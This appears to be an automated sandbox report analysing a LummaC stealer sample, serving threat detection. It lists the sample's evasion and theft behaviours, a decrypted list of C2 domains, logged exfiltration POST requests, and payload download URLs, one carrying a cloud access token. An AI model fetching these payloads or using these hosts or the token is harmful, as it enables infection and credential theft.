Edit tour

Windows Analysis Report
2oM46LNCOo.exe

Overview

General Information

Sample name:	2oM46LNCOo.exe renamed because original name is a hash value
Original sample name:	3a5f8e977a1a8b210f718f433b8488c3.exe
Analysis ID:	1580293
MD5:	3a5f8e977a1a8b210f718f433b8488c3
SHA1:	900c5b61b37edd1a8e5b8d81340832bf0509351c
SHA256:	7eb2fc825498602af9acfc984eccaafc0a86207ce6711b9515430e184538a646
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Entry point lies outside standard sections

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

2oM46LNCOo.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\2oM46LNCOo.exe" MD5: 3A5F8E977A1A8B210F718F433B8488C3)

WerFault.exe (PID: 4340 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 2012 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["shapestickyr.lat", "tentabatte.lat", "wordyfindy.lat", "bashfulacid.lat", "manyrestro.lat", "observerfry.lat", "curverpluch.lat", "talkynicer.lat", "slipperyloo.lat"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1426222320.0000000001542000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1404582172.0000000001529000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1426169334.0000000001529000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 2oM46LNCOo.exe PID: 7284	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 2oM46LNCOo.exe PID: 7284	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 2oM46LNCOo.exe PID: 7284	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 2oM46LNCOo.exe PID: 7284	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T08:53:46.118857+0100	2028371	3	Unknown Traffic	192.168.2.7	49699	172.67.199.72	443	TCP
2024-12-24T08:53:48.234613+0100	2028371	3	Unknown Traffic	192.168.2.7	49700	172.67.199.72	443	TCP
2024-12-24T08:53:50.633552+0100	2028371	3	Unknown Traffic	192.168.2.7	49701	172.67.199.72	443	TCP
2024-12-24T08:53:53.158061+0100	2028371	3	Unknown Traffic	192.168.2.7	49703	172.67.199.72	443	TCP
2024-12-24T08:53:56.077083+0100	2028371	3	Unknown Traffic	192.168.2.7	49709	172.67.199.72	443	TCP
2024-12-24T08:53:59.099876+0100	2028371	3	Unknown Traffic	192.168.2.7	49715	172.67.199.72	443	TCP
2024-12-24T08:54:02.464413+0100	2028371	3	Unknown Traffic	192.168.2.7	49728	172.67.199.72	443	TCP
2024-12-24T08:54:07.675569+0100	2028371	3	Unknown Traffic	192.168.2.7	49740	172.67.199.72	443	TCP
2024-12-24T08:54:10.004695+0100	2028371	3	Unknown Traffic	192.168.2.7	49746	185.166.143.50	443	TCP
2024-12-24T08:54:12.262003+0100	2028371	3	Unknown Traffic	192.168.2.7	49752	52.217.14.36	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T08:53:46.979308+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49699	172.67.199.72	443	TCP
2024-12-24T08:53:48.991999+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49700	172.67.199.72	443	TCP
2024-12-24T08:54:08.422948+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49740	172.67.199.72	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T08:53:46.979308+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49699	172.67.199.72	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T08:53:48.991999+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49700	172.67.199.72	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T08:53:51.660915+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49701	172.67.199.72	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 2oM46LNCOo.exe

Avira: detected

Found malware configuration

Source: 2oM46LNCOo.exe.7284.2.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["shapestickyr.lat", "tentabatte.lat", "wordyfindy.lat", "bashfulacid.lat", "manyrestro.lat", "observerfry.lat", "curverpluch.lat", "talkynicer.lat", "slipperyloo.lat"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: 2oM46LNCOo.exe	Virustotal: Detection: 45%			Perma Link
Source: 2oM46LNCOo.exe	ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 2oM46LNCOo.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: bashfulacid.lat
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: tentabatte.lat
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: curverpluch.lat
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: talkynicer.lat
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: shapestickyr.lat
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: manyrestro.lat
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: slipperyloo.lat
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: wordyfindy.lat
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: observerfry.lat
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: LOGS11--LiveTraffic

Source: 2oM46LNCOo.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.14.36:443 -> 192.168.2.7:49752 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49700 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49699 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49699 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49701 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49740 -> 172.67.199.72:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: observerfry.lat
Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat

Source: Joe Sandbox View	IP Address: 172.67.199.72 172.67.199.72
Source: Joe Sandbox View	IP Address: 185.166.143.50 185.166.143.50

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49728 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49740 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49752 -> 52.217.14.36:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49746 -> 185.166.143.50:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.199.72:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BAJQL1SU3XPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12808Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F164H2S7ONUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15034Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SOA2J1545BSBGY5G75SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20413Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6VQ8FIH0S8HKB93M6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1251Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UYNV6FKXANE2PF5VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585738Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: observerfry.lat
Source: global traffic	HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAATU3DWE&Signature=CB%2FhJqRRscnPJ9O8Lh%2F9UJjvRsI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJIMEYCIQCmp4sJiJ2Vg6lV0IveQh7F4q5yllY1RSaQ%2FRcDZG8jLAIhAPOa65Thr25Wh%2Bug0HyKJXl55OoT1s0rFYCYSSkigJNCKrACCOn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwDuXuwpnkzPvUt7VoqhAIz%2BmwV7tES1WBaFS7IYWek7EXNAzdsYmQgkGyYrYxyA33m%2FJutt9lbP2U%2BMaAYuta1agrCmRKMj5pCeNx%2F%2FwHViPQ9O1Ned5SZGGKGYUIs5Bq6ktSFT%2BMOQ4n4hJi21TpAZk%2BO8TxTIusr5XqnH9VIGNA8dgL7jsf5ft4ir%2FWp2Hc2tIKVTm4EwHvhE8TCDJFhxF9IMnhSEQM1Wo1iIEeHRPK1a6jc18zDcHrHLu3Rf%2FTmzTrnBPx%2FWf4S5A%2F7CtkqMo29ARzMDm3VVSop46xM1Dz7%2FrkryEckuEuDtCT2F7eMPTxyXoW9PbRARoYCpJjbZ4p3lahtqL2qhmtVntLRTt6RNTCPz6m7BjqcAfpKPZ%2Bk48Y1M5IVUnLseVOnLKBZZZTFh9obbou77yeNXL9JcUQ1nOrkQPFNF%2BuaOyO%2FvQpad0BaYzg34uvur9Ge%2FjUPRr9wdY2fX83lmXUzA%2FYVdbRhgq47ryEnk02AY3mG17E8eX%2BqlW8mJlyvN80mj685f8rU0%2FU5eS3JeqKGbqyOm05scABsj1qVc5EsH31I3YZQ1CBRxp1CkA%3D%3D&Expires=1735028375 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAATU3DWE&Signature=CB%2FhJqRRscnPJ9O8Lh%2F9UJjvRsI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJIMEYCIQCmp4sJiJ2Vg6lV0IveQh7F4q5yllY1RSaQ%2FRcDZG8jLAIhAPOa65Thr25Wh%2Bug0HyKJXl55OoT1s0rFYCYSSkigJNCKrACCOn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwDuXuwpnkzPvUt7VoqhAIz%2BmwV7tES1WBaFS7IYWek7EXNAzdsYmQgkGyYrYxyA33m%2FJutt9lbP2U%2BMaAYuta1agrCmRKMj5pCeNx%2F%2FwHViPQ9O1Ned5SZGGKGYUIs5Bq6ktSFT%2BMOQ4n4hJi21TpAZk%2BO8TxTIusr5XqnH9VIGNA8dgL7jsf5ft4ir%2FWp2Hc2tIKVTm4EwHvhE8TCDJFhxF9IMnhSEQM1Wo1iIEeHRPK1a6jc18zDcHrHLu3Rf%2FTmzTrnBPx%2FWf4S5A%2F7CtkqMo29ARzMDm3VVSop46xM1Dz7%2FrkryEckuEuDtCT2F7eMPTxyXoW9PbRARoYCpJjbZ4p3lahtqL2qhmtVntLRTt6RNTCPz6m7BjqcAfpKPZ%2Bk48Y1M5IVUnLseVOnLKBZZZTFh9obbou77yeNXL9JcUQ1nOrkQPFNF%2BuaOyO%2FvQpad0BaYzg34uvur9Ge%2FjUPRr9wdY2fX83lmXUzA%2FYVdbRhgq47ryEnk02AY3mG17E8eX%2BqlW8mJlyvN80mj685f8rU0%2FU5eS3JeqKGbqyOm05scABsj1qVc5EsH31I3YZQ1CBRxp1CkA%3D%3D&Expires=1735028375 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com

Source: global traffic	DNS traffic detected: DNS query: observerfry.lat
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat

Source: 2oM46LNCOo.exe, 00000002.00000003.1511299256.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574302041.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886379427.000000000158E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: 2oM46LNCOo.exe, 00000002.00000003.1426222320.0000000001542000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1511665760.0000000001572000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1404582172.0000000001529000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1452041940.0000000001571000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1426169334.0000000001529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: 2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 2oM46LNCOo.exe, 00000002.00000003.1574302041.0000000001583000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1890837215.00000000062E9000.00000002.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574118043.0000000005D70000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574082227.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
